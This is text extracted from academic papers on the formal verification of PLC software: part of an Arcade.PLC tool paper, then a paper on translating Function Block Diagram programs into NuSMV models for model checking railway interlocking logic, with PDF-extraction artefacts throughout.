http://arcade.embedded.rwth-aachen.dePermission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for pro t or commercial advantage and that copies bear this notice and the full citation on the rst page. To copy otherwise, to republish, to post on servers or to redistribute to lists, requires prior speci c permission and/or a fee. ASE 12, September 3 7, 2012, Essen, Germany Copyright 2012 ACM 978-1-4503-1204-2/12/09 ...$15.00 338 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:24 UTC from IEEE Xplore. Restrictions apply. ProgramProgram Speci cation Parser CompilerAbstract SimulationModel Checker StatespaceCounter- example AnalyzerCounter- example Arcade.PLCre ne Figure 1: Model checking process with Arcade.PLC 2. OVERVIEW AND IMPLEMENTATION PLC Programs are composed of modules called program organization units [7] (POU). A function block (FB) is a POU with a xed interface, which comprises variables used for input and for output and an implementation that is exe- cuted upon a call. Variables can retain their value for the next execution to maintain an internal state between calls (henceforth called global variables ). The actual implementa- tion can be provided in di erent languages. These languages include graphical representations resembling electric circuits, automaton representations similar to Petri nets, assembler dialects and high-level imperative languages [7, Part 3]. Some vendors use proprietary languages or extensions. The other types of POUs are functions , which are FBs equipped with an explicit return value but no internal state, and programs , which are FBs to be used as the main program. 2.1 Features Arcade.PLC can verify all kinds of POUs, i. e., either entire programs or just parts of it can be selected for anal- ysis. Its overall structure is shown in Fig. 1. The user can supply a program as (one or many) text les containing dif- ferent POUs. For now, we support programs written in the standardized languages structured text (ST) and instruction list(IL) and the proprietary statement list (STL) used by Siemens SIMATIC S7. Programs can use an implementation of standard library FBs (counters, edge detection, timers, etc.) written in ST. To handle FBs in di erent languages uni- formly, and also to simplify abstract simulation, the programs are rst compiled into an IR. This also ensures that our ab- stract simulator operates on a well-de ned semantics without having to struggle with semantic nuances such as unde ned or implementation-dependent behavior and vendor-speci c extensions, which are thus hidden in the front-end. For veri cation, the user can specify formulae in CTL and ptLTL . In these formulae, it is possible to express propositions about the values of all non-temporary program variables, which are then evaluated at the end of each execution of a cycle. 2.2 State Space Model checking is performed using an on-the- y algorithm, which starts with a coarse abstraction that is successively re ned [2]. Let VI,VOandVGdenote the sets of input, output and global variables, respectively. Our formal model comprises explicit states of the form /angbracketleftI, G, O/angbracketright, where I, G, O are assignments of all variables in VI, VG, VOto a value in their domain. A transition between states /angbracketleftI1, G1, O1/angbracketrightand/angbracketleftI2, G2, O2/angbracketrightis assumed if the program outputs O2with internal state G2after executing one cycle on the internal state G1with inputs I2. Boolean and integer variables are allowed to contain abstract values, taken from the reduced product of the interval and bit-set domains (each bit can either be{0},{1}or{0,1}). By starting with the initial state and iteratively creating successors using abstract simulation until a xed point is reached, we obtain the reachable state space for model checking. Observe that we do not need to store inputs I, which are not referred to in the formula, in the state space, thereby giving a more space-e cient representation. 2.3 Control Flow Determinization To nd a suitable abstraction, we rst determinize the control ow. This is done incrementally by re ning the ab- straction of each variable, until they dictate a single trace through the program. To do so, we rst guard all condi- tional jumps with predicates. Then, for each unvisited state s=/angbracketleftI, G, O/angbracketright, we simulate it with unknown inputs, i. e., s/prime=/angbracketleftbig I/latticetop, G, O/angbracketrightbig where I/latticetop={v /latticetop| v VI}. We simulate the program until either the cycle terminates, which amounts to nding a successor, or until an abstract value is ambiguous w. r. t. one of the jump predicates. In the latter case, we use predicate transformer semantics to nd the weakest precon- dition that makes the jump predicate unambiguous. This backward transformation is based on symbolic expressions which we generate for each operation in the trace. The result gives rise to a predicate on an input or global variable which is re ned so that abstract simulation on the re ned values satis es the jump predicate. Two speci cs aid in making this e ciently possible: (a) We are always dealing with a single path through the program and (b) PLC programs have to obey the cycle frequency, i. e., they have to produce a result before the start of the next cycle and thus consist of a small number of operations per cycle. Likewise, re nement is applied if the results at the end of a cycle is ambiguous w. r. t. atomic propositions of the speci cation. Example 1. Consider a conditional jump that branches i a >100, where ais a register that contains the interval [30,140] and the symbolic constraint a= (i+ 20) for some input i. Then, wp(a=i+ 20, a > 100) = ( i >80), which entails that assigning [10,79]and[80,120] toideterminizes the control ow. We thus discard the result of the previous simulation and restart the cycle with inputs [10,79]and [80,120] for i.339 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:24 UTC from IEEE Xplore. Restrictions apply. 2.4 CEGAR with Global Variables We do not store symbolic expressions in the state space, e. g., for global variables x, ywe do not know whether x < y if their intervals overlap. Thus, re ning a global variable may introduce additional behavior, i. e., transitions infeasible in the concrete model. To cope with this, we use a CEGAR approach: If a universally quanti ed formula is valid in the
Model_Checking_PLC_Software_Written_in_Function_Block_Diagram.pdf
The development of Programmable Logic Con- trollers (PLCs) in the last years has made it possible to apply them in ever more complex tasks. Many systems based on these controllers are safety-critical, the certi cation of which entails a great effort. Therefore, there is a big demand for tools for analyzing and verifying PLC applications. Among the PLC- speci c languages proposed in the standard IEC 61131-3, FBD (Function Block Diagram) is a graphical one widely used in rail automation. In this paper, a process of verifying FBDs by the NuSMV model checker is described. It consists of three transformation steps: FBD !TextFBD!tFBD!NuSMV . the novel step introduced here is the second one: it reduces the state space dramatically so that realistic application components can be veri ed. The process has been developed and tested in the area of rail automation, in particular interlocking systems. As a part of the interlocking software, a typical point logic has been used as a test case.
Model Checking PLC Software Written in Function Block Diagram Olivera Pavlovi c Siemens Mobility Division Braunschweig, Germany Email: [email protected] Ehrich Technische Universit at Braunschweig Braunschweig, Germany Email: [email protected] Keywords -formal veri cation; model checking; PLC; FBD; IEC 61131-3; I. I NTRODUCTION Programmable Logic Controllers (PLCs) are a special type of computer used in automation systems [1]. Generally speaking, they are based on sensors and actuators which have the ability to control, monitor and interact with a par- ticular process or a collection of processes. These processes are diverse and can be found, for example, in household appliances, emergency shutdown systems for nuclear power stations, chemical process control and rail automation sys- tems. IEC is an organization that provides international stan- dards for electrical, electronic and related technologies. The standard IEC 61131-3 [2] describes inter alia PLC program- ming languages. There are ve PLC languages proposed in the standard. Two of them are textual languages: (a) IL - Instruction List, and (b) ST - Structured Text. The other three programming languages are graphical languages: (c) FBD - Function Block Diagram, (d) LD - Ladder Diagram and (e) SFC - Sequential Function Chart. In this paper, the application and veri cation of PLCs in the rail automation domain is considered. One area of apply- ing PLCs in this domain is the area of electronic interlocking systems based on PLCs. Generally, electronic interlockings are used to control signals, points, line crossovers and level crossings, thereby ensuring safe operation. The most ofthe interlocking software has been written in the graphical language FBD. The goal of our work is to investigate the veri cation of FBDs. In the past years, there has been an increasing interest in analyzing PLC applications with formal methods. The low- level language IL has been the most investigated language in terms of PLC veri cation. Hence, rst attempts to verify FBDs are made by verifying the IL representation of an FBD program. Let us brie y describe some of the approaches for IL veri cation. In [3], timed automata are used to model IL programs. For veri cation, the model checker UPPAAL is used. Function and function block calls are not implemented. [4] proposes Petri nets and SMV for model checking IL programs. As data structures, anything can be used that can be coded with 8-bits. Another method that proposes veri cation with SMV is sketched in [5]. Time and timers are not part of the model in this work. Comparing the existing IL veri cation techniques and analyzing the properties of the software to be veri ed, we took the latter method as a starting point. The theory behind our improvement of the technique was described in [6]. The tool that automates the process was published in [7]. This way, we managed to make the automation of model checking of IL format of interlocking software fully automatic. The goal of [6] and [7] was to apply another method to the interlocking software described in this work. Unfortunately, the models became so complex that just small parts of the software could be veri ed. In the second phase of the project, in order to verify existing industrial software and not just parts of it, the veri cation of FBD programs has been suggested. The main idea of the technique can be found in [8]. In this paper, we formalize and automate this method. what is the novelty here over the papers cited? textFBD!tFBD with dramatic improvements? In the last years, other work on FBD veri cation has been published ([9] and [10]). These papers do not offer enough detail to enable comparison with our work. The paper is organized as follows. Section 2 brie y reviews the PLC structure and PLC programming languages. The theoretical background of the method for FBD veri ca- tion is described in Section 3. There we introduce the textual representation of FBD. Section 4 contains a case study which 2010 Third International Conference on Software Testing, Verification and Validation 978-0-7695-3990-4/10 $26.00 2010 IEEE DOI 10.1109/ICST.2010.10439 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. Input moduleOutput moduleCPUFigure 1. PLC organization illustrates the application area for the work presented here. The automation of the veri cation method is described in Section 5. Finally, the last section draws conclusions and indicates plans for future work. II. P ROGRAMMABLE LOGIC CONTROLLERS As already mentioned, PLCs are a special type of com- puter based on sensors and actuators able to control, monitor and in uence a particular process. In this section, the PLC structure and programming languages are described. A. PLC Structure A typical PLC organization is represented in Fig. 1. Input and output modules are used to transmit data between PLC and connected peripherals. The CPU is a part of a programmable controller responsible for reading inputs, executing the control program, and updating outputs. The focus of a PLC is to repeat periodically the execution of a control program. There are three main phases of this cyclic behavior of a PLC: read data from inputs (sensors), execute the control program, and write data to outputs (actuators). B. PLC Programming languages The program organization units proposed in IEC 61131-3 can be delivered by the manufacturer or programmed by the user according to the rules de ned in this standard. In this work, the software Step7 is used. This is the current software version for programming the PLC family SIMATIC S7 of the manufacturer Siemens AG [11]. The FBD programming language [12] is a restricted graphical representation of the machine-orientated language IL. This means that not all IL programs can be represented in FBD, but on the other hand each FBD program can be mapped to IL. FBD programs are similar to circuit diagrams in electrical engineering and consist of simple elements. For example, in Fig. 3 the following elements can be found. CMP ==I(comparison of two integers), &(conjunction of two Booleans), >=1(disjunction of two Booleans), and = (assignment of a value to a variable). III. T HEORETICAL BACKGROUND With processors getting more and more powerful, and memories growing bigger and bigger, veri cation becomes feasible for more and more complex programs. The veri - cation methods at hand, in particular model checking, turn out to work quite well for our application area. As a tool, we use NuSMV (a New Symbolic Model Veri er). NuSMVwas developed by IRST (Instituto per la Ricerca Scienti ca e Tecnologica) and CMU (Carnegie Mellon University) [13]. It is a reimplementation and extension of SMV , the rst model checker based on BDD. There is no standardized process yet to verify PLC. In this section, we present a veri cation process for PLC software written in FBD. There are essentially three steps: A. in order to make FBD programs processable by NuSMV , graphical FBD programs are translated into textual textFBD programs; B. connections between two graphical FBD elements are represented in the textFBD le by a special type of variables - circuit variables . In order to avoid circuit variables in the NuSMV state space, textFBD programs are translated into tFBD programs; C. a tFBD program can then be easily represented by a NuSMV program. In Fig. 3, the process is shown by means of an example which we will also use later on. A. From FBD to textFBD We present the FBD components and their corresponding textFBD statements along with their informal semantics. Then we indicate their formal operational semantics and mention how isomorphism of FBD and textFBD semantics can be proved, referring to [14] for the details. 1) FBD and textFBD syntax: In the textFBD format of an FBD program, each graphical FBD operator is given a textual representation. We give an overview of the FBD elements and their representations in textFBD. Bit operations Logical AND, OR andExclusive-OR operations are represented in textFBD by Out= (In1In2)where= & orjorXOR The AND and ORoperations may have more than two inputs, giving rise to corresponding textFBD constructs like Out= ((In1&In2) &:::&In n) The instruction negate binary input negates the input of an FBD operator In This is represented in textFBD by !In. The FBD assignment = InOperand is simply represented by operand =In. Among the bit operations, there are also reset output (R) andset output (S). S InOperand R InOperand 440 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. FBD ILprogram ( format) Modelising NuSMV model Model Checking satisfiednot satisfied + counterexampleCreate formattextFBD textFBD format Create model NuSMVList of Op. with local variables Substitution tFBD formatVariable descriptionCTL specificationTable of testcasesInterface description FormalisationFigure 2. Model checking FBD programs If the input value of the Roperator is true, then the operand is set to false . If the input value is false, then the operand is unchanged. As for the operator S, the operand is set only if its input value is true. A more precise semantics of the operators is given in [14]. Here we focus on their syntax. The operators are represented in textFBD by R(Operand;In);S(Operand;In) By means of the Noperator negative edge detection 1 !0, the signal state at the input is compared with that in the operand ( the edge memory bit ). If the input is false and the operand has stored true in the previous cycle, then a negative edge is recognized. In this case, the output is set totrue, and to false otherwise. The other way around, the P operator positive edge detection 0 !1recognizes a raising edge . These operators P InOperand N InOperand Out Out are represented in textFBD by Out=N(Operand;In);Out=P(Operand;In)  Comparators For comparing two input values, the following comparison operators may be used: equal ( ==), unequal(<>), greater (>), greater or equal ( >=), less (<), less or equal ( <=). For instance, the operator CMP==IIn1 In2 Out which tests whether two inputs are equal, is represented in textFBD by Out= (In1==In2). Jumps Jump operations can be separated into con- ditional jumps and absolute jumps. Depending on the input value true orfalse , a conditional jump can be expressed by JMP orJMPN , respectively. The effect is to set the programcounter to the position marked by Label if the Incondition is true (JMP ) or the Incondition is false (JMPN ), respectively. JMPN InLabel JMP InLabel In textFBD, this is represented by JMP(In;Label );JMPN (In;Label ) An absolute jump corresponds with a goto statement and is simply represented by JMP(true;Label ). Integer math instructions Addition, subtraction or multiplication of two integers is represented in textFBD by !(Out;In1;In2)where!=ADD IorSUB IorMUL I: Move The MOVE operator copies the value at the input to the output: Out=In. For generating the textFBD le, the concept of a circuit variable is very important. These variables are generated when connections between two operands are to be repre- sented. The circuit variables are marked as Livariables (cf. g. 3). Fig. 3 gives an impression of the translation from FBD to textFBD. 2) FBD and textFBD semantics: Leth:FBD!textFBD be a map mapping each FBD element eto its corresponding textFBD representation a=h(e). The order of executing FBD operators in a network is determined by a mapping next: 2FBD!FBD determining which element is executed next, depending on the set of elements already executed. In textFBD, this role is taken by the program counter which can be de ned as a mapping p: textFBD!IN, mapping each statement ato its line number pcin the program. 441 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. _L1 = (int1 == 20); _L2 = ((bool1 & bool2) & _L1); _L3 = (bool3 & bool4); _L4 = (_L2 | L3); result1 = _L4; result2 = _L4;textFBD result1 = ; result2 =(((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4)) (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4));tFBD MODULE main VAR pc : 1..2; zyklus : 1..3; result1 : boolean; result2 : boolean; DEFINE MAX_pc := 2; MAX_zyklus := 3; bool1 := true; bool2 := true; bool3 := false; bool4 := true; int1 := 20; ASSIGN init(pc) := 1; init(zyklus) := 1; init(result1) := false; init(result2) := false;NuSMV next(result1) := case pc = 1 : (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4)); 1 : result1; esac; next(result2) := case pc = 2 : (((bool1 & bool2) & (int1 == 20)) | (bool3 & bool4)); 1 : result2; esac; next(zyklus) := case pc=2: case (zyklus+1) <= MAX_zyklus : zyklus+1; 1 :zyklus; esac; 1 : zyklus; esac; next(pc) := case pc+1 <= MAX_pc : pc+1; pc=2 : 1; 1 : pc; esac;& int1CMP ==I 20 bool1 bool2 & bool3 bool4>=1 =result1 =result2FBD ~ ~Figure 3. From FBD to NuSMV An FBD network Nmay be given a transition system T= (C;c0;!)as operational semantics, where Cis the set of FBD con gurations of N,c0is the start con guration, and!is the next-con guration relationship. An FBD con- guration is a triple c= (;e;E )whereis a state of the program variables, eis the element in the network Nto be executed next, and Eis the set of component elements in Nnot yet executed. Correspondingly, a textFBD program Pmay be given a transition systemS= (D;d0;,!)as operational semantics, whereSis the set of textFBD con gurations, d0is the start con guration, and ,!is the next-con guration relationship. A textFBD con guration is a triple d= (;a;pc )where is as above, ais the textFBD statement to be executed next,andpcis the program line in which ais. For the details of how these transition systems are de ned, we refer to [14]. There it is also shown that there is a bijective mapping h:C ! D with the property that h(c0) =d0andc!c0,h(c),!h(c0). Thus, an FBD network and its corresponding textFBD program have isomorphic operational semantics, so they are equivalent in a strong sense. B. From textFBD to tFBD The new tFBD format has the advantage that some circuit variables are avoided, thus reducing the state space for model checking dramatically. A textFBD line in which a new circuit variable is created may be omitted in tFBD under certain circumstances. Then, in each other line of the 442 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. ... tFBD textFBD x = (x , ..., x ), x - Variable; _L = (_L , ..., _L ); f(x) = (f , ..., f )(x);1 n i 1 j-1 1 j-1 j+1 k-1 g(x) = (f , ..., f )(x)_L = (_L , ..., _L ); j+1 k-1d= ( , 1 1 _L = f (x), p+1)1 1 ... d= (i i _L = f (x), p+i)i i , d= (j-1 _L = f (x), p+j-1)j-1 j-1 j-1, ... d = ( ,k op (x, _L ) p+k)2 k,d = (1 1(x, f(x)), p +1) , op1 d = (2 op (x, g(x)), p +2)2 ,2 d= (j op (x, _L), p+j)1 j, d= (k-1 _L = f (x), p+k-1)k-1 k-1 k-1,d= (j-1 _L = f (x), p+j-1)j-1 j-1 j-1, d= (j+1 _L = f (x), p+j+1)j+1 j+1 j+1,Figure 4. Substitution of circuit variables textFBD program where this circuit variable is used, it may be substituted by the corresponding expression. The process is illustrated in Fig. 3. To be more precise, textFBD programs are transformed to tFBD programs in the following way: each textFBD assignment Li=fi(x)of an expression fi(x), wherexis a sequence of arguments, to a circuit variable Liis omitted. Instead, each occurrence of Liin righthand sides of other textFBD statements is substituted by fi(x). Similar to a textFBD program, a tFBD program can be given an operational semantics in the form of a transition systemS0= (D0;d0 0;,!0)whereD0is the set of con gura- tions,d0 0is the start state, and ,!0is the next-state transition function. We refer to [14] for details. The behaviour of textFBD and tFBD transition systems with respect to circuit variables is illustrated in Fig. 4. Clearly, since variables are eliminated, there can be no bijection between the state spaces and thus no isomorphism. Reducing the state space was precisely the motivation for introducing the transformation of textFBD to tFBD. But still, the operational semantics of textFBD and tFBD can be equivalent, albeit in the weaker sense of obser- vational equivalence: they can be strongly bisimilar. LetS= (D;d0;,!)be a textFBD transition system and S0= (D0;d0 0;,!0)the corresponding tFBD transition system. S andS0are strongly bisimilar, ( S  S0), iff there is a relationship BDD0which is a strong bismulation for (d0;d0 0). That means: (d0;d0 0)2Band for all (d;d0)2B we have d,!g2D)9g02D0withd0,!0g0and(g;g0)2B d0,!0g02D0)9g2D withd,!gand(g;g0)2B Fig. 4 shows system states before and after using circuit variables, (1or0 1), respectively, and ( j, or0 2, orkor. 0 3), respectively. The following example shows that there is a problem. Example 1. (Comparing FBD, textFBD and tFBD) Letxandybe two Boolean variables which are combined by conjunction. If the result is true, thenxis set to false by theRoperator. The same happens with y. Ifxandy aretrue in the beginning, tFBD does not yield the expected result (cf. Fig. 5). textFBD FBD tFBDx true truey 0: & yxR Rx y_L1 = x y; R(x, _L1);& R(y, _L1);R(x, ( )); x y R(y, (x y));& & x false falsey 3:x false falsey 3:x false truey 2: Figure 5. Example: FBD, textFBD and tFBD synopsis The problem is solved by restricting the use of variables appropriately, forbidding situations where a circuit variable may not be substituted: 1) if an operator with local variables is to be assigned to the circuit variable; 2) if the circuit variable is used as an operand in an operator with local variables. With this restriction, strong bisimilarity between the textFBD and tFBD operational semantics can be shown [14]. Example 2. (Strong bisimulation) Strong bisimulation for the example in Fig. 4 works as follows. B=f(d1;d0 1);:::; (di;d0 1);:::; (dj1;d0 1);(dj;d0 1); (dj+1;d0 2);:::; (dk1;d0 2);(dk;d0 2)g C. From tFBD to NuSMV The main program is shown in MODULE main (cf. Fig. 3). The module may have several sections. For our FBD modeling, the VAR,DEFINE ,ASSIGN andSPEC sections are used: the VAR section for variable declarations; theDEFINE section for de ning symbols for frequently used expressions; the ASSIGN section for describing assignments, 443 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. and the SPEC section for specifying CTL speci cations to be checked in the model. For an example, cf. Fig. 3. For more detail, cf. [14]. A possible program property to be checked may look like this: at the end of the rst cycle, the variables x1;:::;x n should have values a1;:::;a n . Speci cations for a NuSMV model can be written in CTL (Computation Tree Logic), LTL (Linear Time Logic) or PSL (Property Speci cation Language). For example, for specifying the above property in CTL, we have to write CTLSPEC in front of the formula. The property given above then looks as follows. CTLSPEC AG((cycle = 1 & pc = MAX PC)) ((x1 = a1 )& . . . & (xn = an ))) Where the program cycle is determined by the integer variablecycle . A more extended case study is given in the next section. The NuSMV user has the choice between a modular or a atrepresentation of functions. In modular representation, each function is given a separate module. The advantage is that modeling of FBD programs is rather straightforward. The disadvantage is that with each instantiation of a module, the state space grows very rapidly. In at representation, all functions are speci ed in one module so that the state space remains constant when running the model checker. Indeed, this can be quite ef cient. The disadvantage is that the functions have to be (re)modeled by hand, an effort that may only by feasible for small systems. Summing up, the process given above gives isomorphic transformations in the rst two steps, and a strongly bisimilar transformation in the third step. This way, model checking PLC software written in FBD becomes feasible in practice. This is demonstrated in the next section. IV. C ASE STUDY Here we describe how the method is applied in the area of railway automation. We concentrate on FBD software as it is used by one family of PLC-based interlocking systems. Interlocking systems are railway facilities which are used for the central control of points and signals (cf. [15]). They have outdoor and indoor parts. The indoor parts consist of hardware and software. The interlocking software is composed of several com- ponents which are responsible for controlling the various interlocking functions. One such component is a point. Like the other components, it consists of several code modules. These code modules depend on the equipment, but each one is designed for only one point. One function block diagram in such a code module of a point component is responsible for controlling the point. This function block diagram is used here as a use case for demonstrating the veri cation method proposed in this paper. From this module, the corresponding NuSMV model is created using our method. The model is presented below.Description Precondition Expected reaction From a right position, the left direction relays is activated by means of a reposition command, and the reposition pro- cess is activatedModuleIF =Right , ComIF =ReposComModuleIF =Left+S1 After at least 20 ms, the position relays is acti- vated=>,iTime = 20 ModuleIF =S2 After at least 30 ms, protection is activated=>,iTime = 30 ModuleIF =S3 After at least 40 ms, the frog is started to move=>,iTime = 40 ModuleIF =S4 Table I EXAMPLE OF A TEST CASE :MOVING THE FROG OF A POINT LEFT We start with describing the test cases, taken from practice, which are used for checking correctness of the software. The test cases form the basis for constructing the veri cation scenarios. A. Test case description In table I we give a simpli ed description of a test case of the code module for point control. The activation of the point actuator component is checked in four steps before moving the point blade. Each step is represented by a description, a de nition of preconditions (start con guration of the test case), and a de nition of the expected reaction. For better understanding table I, we explain the concept of a variable domain in more detail. In the description of preconditions and expected reactions of a test case, we not only use program variables like iTime , but also variable do- mains like ModuleIF orComIF . A variable domain contains a description of several program variables. This can be better explained using the variable domain ModuleIF as an example. It is de ned in table II. The following variables belong to this domain: bPointPosition, bDirectionRight, bDirectionLeft, bRepetition, bRepositionActive, bPointPositionRelays, bProtection and iTime . If ModuleIF has the value Right , then bPointPosition =1, bDirectionRight =1 and bDirectionLeft =0. Variable domains are used in the description of inter- faces. As shown in table II, the module interface is de- scribed by the variable domain ModuleIF and the variables bPointPosition ,bDirectionRight ,bDirectionLeft , etc. A vari- able domain contains different variable assignments in dif- ferent test cases. In order to enable a clear test case descrip- tion, all variable assignments are listed for each variable do- main. For example, the variable assignments for ModuleIF is de ned by ModuleIF2fLeft, Right, S1, S2, S3, S4, :::g. Thus, the precondition in the rst step of the test case is represented by ModuleIF=Right expressing that the direction relays should be in the right position. This 444 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. ModuleIF - Module Interface Left Right S1 S2 S3 S4 bPointPosition 0 1 bDirectionRight 0 1 bDirectionLeft 1 0 bRepetition 1 0 bRepositionActive 1 bPointPositionRelays 1 0 bProtection 1 0 iTime 0 ComIF - Command Interface ReposCom bComActive 1 bFunction 1 iElement 100 Table II DEFINITION OF INTERFACES - VARIABLE DOMAINS means that, before executing the test case, we must have bPointPosition =1,bDirectionRight =1 and bDirectionLeft =0 (cf. table II). Similarly, at the beginning of the test case, ComIF is de ned as ReposCom . If an interface is not speci ed in the precondition of a test case, it assumes its initial value which should be de ned at the beginning of the test table. When describing the preconditions of the 2nd, 3rd and 4th step of the test case, we have the symbol combination => . This means that the test case is based on the previous step. For instance, in the 2nd step, all variables except for iTime have their values from the expected outcome of the 1st step. The latter is described by ModuleIF=Left+S1 . That means thatbPointPosition =0,bDirectionRight =0,bDirectionLeft =1, bRepetition =1 and bPositionActive =1. When adding two or more variables of a variable domain symbolically, it is possible that a variable occurs in the description of both (or all) elements of the sum. In this case, the variable is to be assigned the value of the last occurrence. For instance, bPointPosition is given the value 1 in Left+Right . When describing the preconditions of a test case, we may also assign values to single variables instead of value do- mains. For instance, the variable iTime is assigned different values in the 2nd, 3rd and 4th steps of the test case. The same holds when describing the expected reaction. B. NuSMV Component Model An extract of the NuSMV model of the point component is shown in table III. We show only lines from the tFBD model in which the following program variables change: bPointPosition, bDirectionRight, bDirectionLeft, bReposi- tionActive, bRepetition, bComActive, bFunction, iElement . These are the variables which are used in the speci cation. The variables having no role in our context are denoted by var1, var2, etc. in table III.In the model description as well as in the speci cation, the data are represented in a changed format in order to hide the reference to the original software. The rules for transforming FBD programs into the NuSMV input language are described above in section III. In this section, we show how to represent speci cations as logical formulae. C. Description of veri cation scenarios In the case study, veri cation scenarios are described in CTL. Two parameters are important: 1) the program counter pcwhich assumes the value MAX pcat the end of a program cycle, and is then set to 1 again; 2) the cycle counter cycle . As said before, the test case descriptions of the component serve as basis for formulating the veri cation scenarios. Since a test case is de ned by a precondition and an expected reaction, we may represent this by the following scenario. ModuleIF = Right & ComIF = ReposCom ) (1) AG( (cycle = 1 & pc = MAX pc)) ModuleIF = Left + S1 ) Bearing in mind the interface description in table II, the rst step of the scenario may be represented by the following formula. ((bPointPosition = 1 & bDirectionRight = 1 & (2) bDirectionLeft = 0) & (bComActive = 1 & bFunction = 1 & iElement = 100 ))) AG( (cycle = 1 & pc = MAX pc)) (bPointPosition = 0 & bDirectionRight = 0 & bDirectionLeft = 1 & bRepetition = 1 & bRepositionActive = 1 )) The remaining three formulae are created in a similar way. As mentioned before, the symbol combination => says that the precondition of the current step has to be extended with the expected reaction of the previous step. For the 2nd step, we thus have (ModuleIF = Left + S1 & iTime = 20 )) (3) AG( (cycle = 1 & pc = MAX pc)) ModuleIF = S2 ) Alternative representation of the speci cation: If only one formula is to be checked, we may take the variable assignments from the precondition and de ne their values as initial values of the model variables. Then a scenario may be described by the following formula AG( (cycle = 1 & pc = MAX pc)) (4) expected reaction ) With this approach, we build a slightly different NuSMV model where the set of initial states in the model is reduced. As an example, table III shows part of the model which refers to some of the variables of our accompanying test case. There the initial values of the variables bPointPosition, bDirectionRight andbDirectionLeft are de ned using the init clause. In contrast, the variables bComActive, bFunction and iElement are de ned in the DEFINE section because their values are unchanged in the model. 445 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. tFBD . . . 48 R(bRepositionActive, (var10 jvar11 jvar12));. . . 50 R(bRepositionActive, ((((var13 & !var14) & (var15 & !var16)) jvar17) jvar18));. . . 52 R(bRepositionActive, (var13 & !var14) & (var19 >var20));. . . 88 bPointPosition = var1;. . . 96 bRepositionActive = ((var21 & !var22) j((!var21 & !var23) jvar24));. . . 104 bDirectionRight = bPointPosition; 105 bDirectionLeft = !var2;. . . 120 S(bPointPosition, var2);. . . 122 S(bRepetition, var3); 123 R(bRepetition, ((var4 & !var5) j((var6 & !var7) & var8) j ((var7 & !var6) & var9)));. . . 131 R(bPointPosition, var2);. . . DEFINE bComActive := 1; bFunction := 1; iElement := 100; ASSIGN init(bPointPosition) := 1; next(bPointPosition) := case pc = 88 : var1; pc = 120 & var2 : 1; pc = 131 & var2 : 0; 1 : bPointPosition; esac; init(bDirectionRight) := 1; next(bDirectionRight) := case pc = 104 : bPointPosition; 1 : bDirectionRight; esac; init(bDirectionLeft) := 0; next(bDirectionLeft) := case pc = 105 : !var2; 1 : bDirectionLeft; esac; init(bRepetition) := 0; next(bRepetition) := case pc = 122 & var3 : 1; pc = 123 & ((var4 j!var5) j(((var6 & !var7) & var8) j((var7 & !var6) & var9))) : 0; 1 : bRepetition; esac; next(bRepositionActive) := case pc = 48 & (var10 jvar11 jvar12) : 0; pc = 50 & ((((var13 & !var14) & (var15 & !var16)) jvar17) j var18) : 0; pc = 52 & ((var13 & !var14) & (var19 >var20)) : 0; pc = 96 : ((var21 & !var22) j((!var21 & !var23) jvar24)); 1 : bRepositionActive; esac; Table III NUSMV MODEL OF THE POINT COMPONENTD. Veri cation results The textFBD format of the software component under consideration has 165 lines of code. It uses about 100 vari- ables (90 Boolean and 10 integer). The model veri cation was performed on an Intel(R) Xeon(R) CPU 5150 computer with 2,66 GHz and 3,25 GB RAM. A detailed description of the NuSMV model checker may be found in [16] and [17]. Its most important properties are summarized in [13]. The basic steps of NuSMV veri cation work as follows. 1) in the rst step, the model is read; an internal hierar- chic representation is set up and stored 2) in the second step, the hierarchic representation is transformed into a attened representation; it contains only one module in which all modules and processes are instantiated 3) then the BDD variables are generated 4) the attened model is represented using BDDs 5) after generating the BDD representation, the CTL speci cations can be checked The execution of the rst three steps took about 1 second. The execution times for the other two steps was different depending on which of the variants explained above was used. One model for all scenarios: Formulae (1), (2) and (3) describe how the speci cation for the rst variant of the NuSMV model is constructed. The initial values of the variables in question are not de ned in the model. From about 1065states, about 1014states were reachable. Setting up the BDD-based model took slightly more than half an hour. Checking the speci cations took 30 to 80 seconds per formula. One model for one scenario: In the second case, a model is generated for each scenario. The preconditions for the scenario are initialized in the model. The speci cation is given in the form of formula (4). In the NuSMV model, about 6000 of the 1060states were reachable. Setting up the BDD-based model took about 40 minutes. Checking the speci cation then took less than 1 second. V. A UTOMATION OF THE VERIFICATION METHOD As mentioned before, the CTL speci cation is set up using the descriptions of the test case and the module interfaces (cf. g. 2). CTL formulae are easily constructed by combining information from the tables, but this must be done by hand. Creating the NuSMV model, however, is a little more complicated, but it can be automated. With the method described here, an arbitrary FBD pro- gram is modeled in a way that makes it possible to verify it with the NuSMV model checker. As mentioned above in section III, we propose to rst construct the textFBD model, then the tFBD model, and then the NuSMV model. In what follows, we give a more detailed description of this process. 446 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. <N-Statement > ::= . . . j<Bitlogic > < BitlogicEnd > (1) <Bitlogic > ::= . . . jA<Operand > < End> (2) jA(<End> < Compare >)<End> (3) j<Bitlogic >A<Operand > < End> (4) j<Bitlogic >O<End> < Bitlogic > (5) <Compare > ::= L<Operand > < End>L<Operand > (6) <End>COMPARETOK <End> <BitlogicEnd > ::= . . . j<AssignEndN > (7) <AssignEndN > ::= =<Var> < End> < AssignEnd > (8) 